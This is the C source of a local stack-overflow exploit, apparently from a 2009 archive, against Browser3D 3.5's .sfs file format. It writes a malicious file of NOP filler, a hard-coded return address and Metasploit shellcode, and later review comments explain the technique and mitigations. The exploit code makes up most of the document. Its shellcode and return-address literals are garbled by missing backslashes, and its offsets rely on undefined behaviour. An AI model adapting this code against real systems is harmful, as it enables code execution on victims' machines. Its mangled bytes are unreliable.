
# Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit (c)
# Published : 2009-01-22
# Author : SimO-s0fT


#include<stdio.h>
#include<string.h>
#include<windows.h>

/* Browser3D local BOF exploit
 * coded by SimO-s0fT ( maroc-anti-connexion@hotmail.com)
 * greetz to: all friends & all Moroccan hackers
 * special tnx for str0ke
 */
/* win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com */
/*
 * Payload bytes that main() copies into the tail of the generated file.
 * The author's comment above describes them as a 160-byte Metasploit
 * win32_exec payload with CMD=calc, i.e. a proof-of-concept payload that
 * starts the Windows calculator.
 *
 * NOTE(review): as shown on this page the literals have no backslash in
 * front of each "x", so the compiler sees plain ASCII text rather than hex
 * escapes, and the array is far longer than the 160 bytes main() reads from
 * it. Treat this listing as a record of the technique, not as a
 * byte-accurate sample for signatures or test corpora.
 */
unsigned char scode[] =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc2"
"xf8x23x02x83xebxfcxe2xf4x3ex10x67x02xc2xf8xa8x47"
"xfex73x5fx07xbaxf9xccx89x8dxe0xa8x5dxe2xf9xc8x4b"
"x49xccxa8x03x2cxc9xe3x9bx6ex7cxe3x76xc5x39xe9x0f"
"xc3x3axc8xf6xf9xacx07x06xb7x1dxa8x5dxe6xf9xc8x64"
"x49xf4x68x89x9dxe4x22xe9x49xe4xa8x03x29x71x7fx26"
"xc6x3bx12xc2xa6x73x63x32x47x38x5bx0ex49xb8x2fx89"
"xb2xe4x8ex89xaaxf0xc8x0bx49x78x93x02xc2xf8xa8x6a"
"xfexa7x12xf4xa2xaexaaxfax41x38x58x52xaax08xa9x06"
"x9dx90xbbxfcx48xf6x74xfdx25x9bx42x6exa1xf8x23x02";
/*
 * Assembles a 430-byte buffer on the stack and writes it to "simo.sfs" in
 * the current directory; argc and argv are not used. The buffer is built
 * from four pieces in order: filler, a hard-coded return address, a short
 * NOP run, and the scode payload.
 *
 * NOTE(review): presumably the intended sizes are 262 + 4 + 4 + 160 = 430,
 * which matches sizeof(exploit). With the escape backslashes missing from
 * the literals on this page, strlen(ret) and strlen(nop) no longer have
 * those lengths and the pieces do not fit the buffer as shown.
 *
 * Defensive reading: the artefact is a .sfs file that opens with a long run
 * of 0x90 bytes. The technique as written depends on a fixed return address
 * and on executing bytes placed on the stack, so ASLR, DEP and stack cookies
 * on the target each break it; the lasting fix is bounds checking in the
 * application's .sfs parser (not visible here; inferred from the page
 * title).
 *
 * Always returns 0, including when the output file could not be opened.
 */
int main(int argc,char *argv[]){
    printf("t ===>viva marrakesh city<===tn");
    FILE *openfile;
    /* Output image. Never initialised, so any byte the memcpy calls below
     * do not reach is leftover stack content, and it is written to disk. */
    char exploit[430];
    char junk[262];
    /* Hard-coded return address; the author's comment ties it to one
     * specific Windows build, so it is not portable across systems. */
    char ret[]="x68xD5x857C";//jmp kernel32.dll esp (windows trust sp2)
    char nop[]="x90x90x90x90";
    /* Fills all 262 bytes of junk with 0x90 and leaves no NUL terminator. */
    memset(junk,0x90,262);
    /* NOTE(review): every strlen(junk) below reads past the end of junk
     * looking for a terminator, which is undefined behaviour; the offsets
     * are only 262 if a zero byte happens to follow the array. */
    memcpy(exploit,junk,strlen(junk));
    memcpy(exploit+strlen(junk),ret,strlen(ret));
    memcpy(exploit+strlen(junk)+strlen(ret),nop,strlen(nop));
    /* Copies a fixed 160 bytes from scode regardless of its actual size. */
    memcpy(exploit+strlen(junk)+strlen(ret)+strlen(nop),scode,160);
    openfile=fopen("simo.sfs","wb");
    /* NOTE(review): a failed fopen is reported but not handled; execution
     * continues and passes a NULL stream to fwrite and fclose. */
    if(openfile==NULL){ perror("can't opening this filen"); }
    /* Writes the whole 430-byte array; the return value is not checked. */
    fwrite(exploit,1,sizeof(exploit),openfile);
    fclose(openfile);
    printf("file created ....!"
                 "open it whit Browser3d");
    return 0;
}
